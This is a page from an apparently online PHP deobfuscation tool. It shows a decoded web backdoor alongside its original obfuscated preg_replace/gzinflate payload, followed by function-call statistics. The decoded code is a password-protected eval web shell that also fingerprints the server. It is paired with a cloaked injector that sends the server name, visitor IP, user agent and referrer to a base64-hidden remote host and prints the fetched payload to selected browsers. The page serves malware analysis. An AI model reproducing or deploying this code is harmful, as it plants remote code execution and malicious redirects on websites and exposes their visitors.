Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61..
Decoded Output download
error_reporting(0);
$_passssword = "30a5f24299f2aa84eb057fa28b6eedac";
if (!@$_POST["p1"] AND @$_POST["pass"]==$_passssword) {
$a = array(
"uname" => php_uname(),
"php_version" => phpversion(),
"safemode" => @ini_get("safe_mode"),
);
echo serialize($a);
} elseif(!empty($_POST["p2"]) AND $_POST["pass"]==$_passssword) {
eval(base64_decode($_POST["p2"]));
} elseif(!empty($_POST["p1"]) AND $_POST["pass"]==$_passssword) {
eval($_POST["p1"]);
}
unset($_passssword);
$ua = @$_SERVER['HTTP_USER_AGENT'];
$url = base64_decode("aHR0cDovL2Rhenplci5zbHlpcC5jb20vb3JkcG0vP2V4cG9ydD03ZjUzZjhjNmM3MzBhZjZhZWI1MmU2NmViNzRkODUwNyZ1cmw9NDkxNDcmZz02OQ==") . "&host=" . @$_SERVER["SERVER_NAME"] . "&ip=" . @$_SERVER["REMOTE_ADDR"] . "&ua=" . base64_encode($_SERVER["HTTP_USER_AGENT"]) . "&ref=" . base64_encode(@$_SERVER["HTTP_REFERER"]);
if (
empty($echo_done)
AND
!empty($_SERVER["HTTP_REFERER"])
AND
!empty($ua)
AND
(substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125')
AND
!preg_match("/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'])
AND
((preg_match("/Trident\/7\.0;/i", $ua) && preg_match("/rv\:11\.0/i", $ua)) OR stristr($ua, "MSIE") OR stristr($ua, "android"))
) {
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$code = curl_exec($ch);
} elseif (function_exists("fsockopen")) {
$m = parse_url($url);
$fp = fsockopen($m["host"], 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, "GET " . $m["path"] . "?" . $m["query"] . " HTTP/1.1
Host: " . $m["host"] . "
User-Agent: PHP" . "
Connection: Close
");
$code = "";
while (!feof($fp))
$code .= fgets($fp, 100);
list($headers, $code) = explode("
", $code);
fclose($fp);
}
}
if (!empty($code) AND base64_decode($code)) {
$echo_done = true;
print base64_decode($code);
}
}Did this file decode correctly?
Original Code
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lVVtb6pIFP7Or5hOTIXEbZHWvsbdupXbdnNFl2I3sTVkhEFogWEHtNXb/vd7BhTFdG+6k5iRc57zzDlzXkaSKOeM25wmjGdBPJVV5VKSanZCUlivjLuojfCRSlqedqydn3sa
IWfHdKK2Tj2inU1OKHWJgy+lwEPy3lXNHvTvrUecNPEYdYwu2kiAEI/b7W1qBf2QEKwagUMI52Qh599i4VlMIopR+3eU+Imdf8lKY6MX0jnlacDiNWr1WYGlxKMRcwumqyAO7CnN5Fxs5/IVGMIWG3V8hlLKAxIGSyrXCMg/EA1TGnjyHo2SbCGXIWl4rORRfiVIOiehPCEpPTm2XerA0VWiXx3U/N8HVUyBWZJmcQqBVwxEpmfi7iFL97r5oJuP9VvLGthD+LI7N7p
h1ceXgOEhgKq+Y3Jrqk6Xzb9rpk/jJHSC1nJyGybOdet5oqnzydFfL86NOh9oD8fOzfnC7apHo+fhcvTsPxtR76i3/NMfPY/80T93zV401IzoITCW5ku/O3w1FqOmE72eG92XN6PrRKOlqvX/brexgg4Q3vdZmrUx/N34jYvdNjo9HUpPoIJkF2Pqvb6l251u11xhZiTHrEKj8Sota4OdyxBZEFacep+YXe3Ymfo33dTN/P7z9iiyU2RW1JntspgquRRym+9l4v+D6V
PwjFTlcjqbpBmXMx5EG6r6VvT1sdJAagOdKGivjeqnxwdNrVXfYU84ndoRyRxfxofylLFpSCcse4/SWGwL4jP2nlLCHf99AqPjnaQv70Hs0jfKlcMAN9AvqmrHY7lymMUDl8bZ0+Hp04F6WVBBkGh/H1VwfP500WwCpoQoqG8iiD0Q8YOggXDv/k7Hn8hJ7HIWuFhRpHXniCR5s9jJYIjY9A3AqYwdqH4b5kYGSMCVk6Xm+NAUpVZeDRCxciF0G0ug4Ry/ga6H5vf+w
LKtu57eH1oN1PoKGjYRFQ+/AjZ1a2galtkx7qFYGqi5ZVQT9bl2FtLjCNOVfj1zPoncS5nzwhIaF5GXbBFQJYSn1AY+eeXgRu0loC9t5Vr0iEXD4nEDnUHN1eDFiVmxQzaKuyithSPAsH2eWN4rDzIqNJC5G91Cov0Ec0Iyv+jlP9aif2eULwoZEnV32DxoPvGn+BacuCgNC5cESOiGMPJ/60yh6C7Q4HaA1/JrFsc0v5ULdB2ylAqh+OGt692+Yoyr8lc/CCm8jB5l
Xh6YUlFvTA/gzuBlSosYm6q6c0AIOZFrPiUuPHKNwkiBA+lbEubzuPRsrazae45wP3dho/goSkAqq389Ugp28eLsvFi5olIN5SQDZzI+oxv2hAdx9inBqvSkj58='\x29\x29\x29\x3B",".");//iendFunction Calls
| gzinflate | 2 |
| preg_replace | 1 |
| base64_decode | 2 |
Stats
| MD5 | d1ed5f2d6e53b1244ebc9e9a4066219d |
| Eval Count | 3 |
| Decode Time | 90 ms |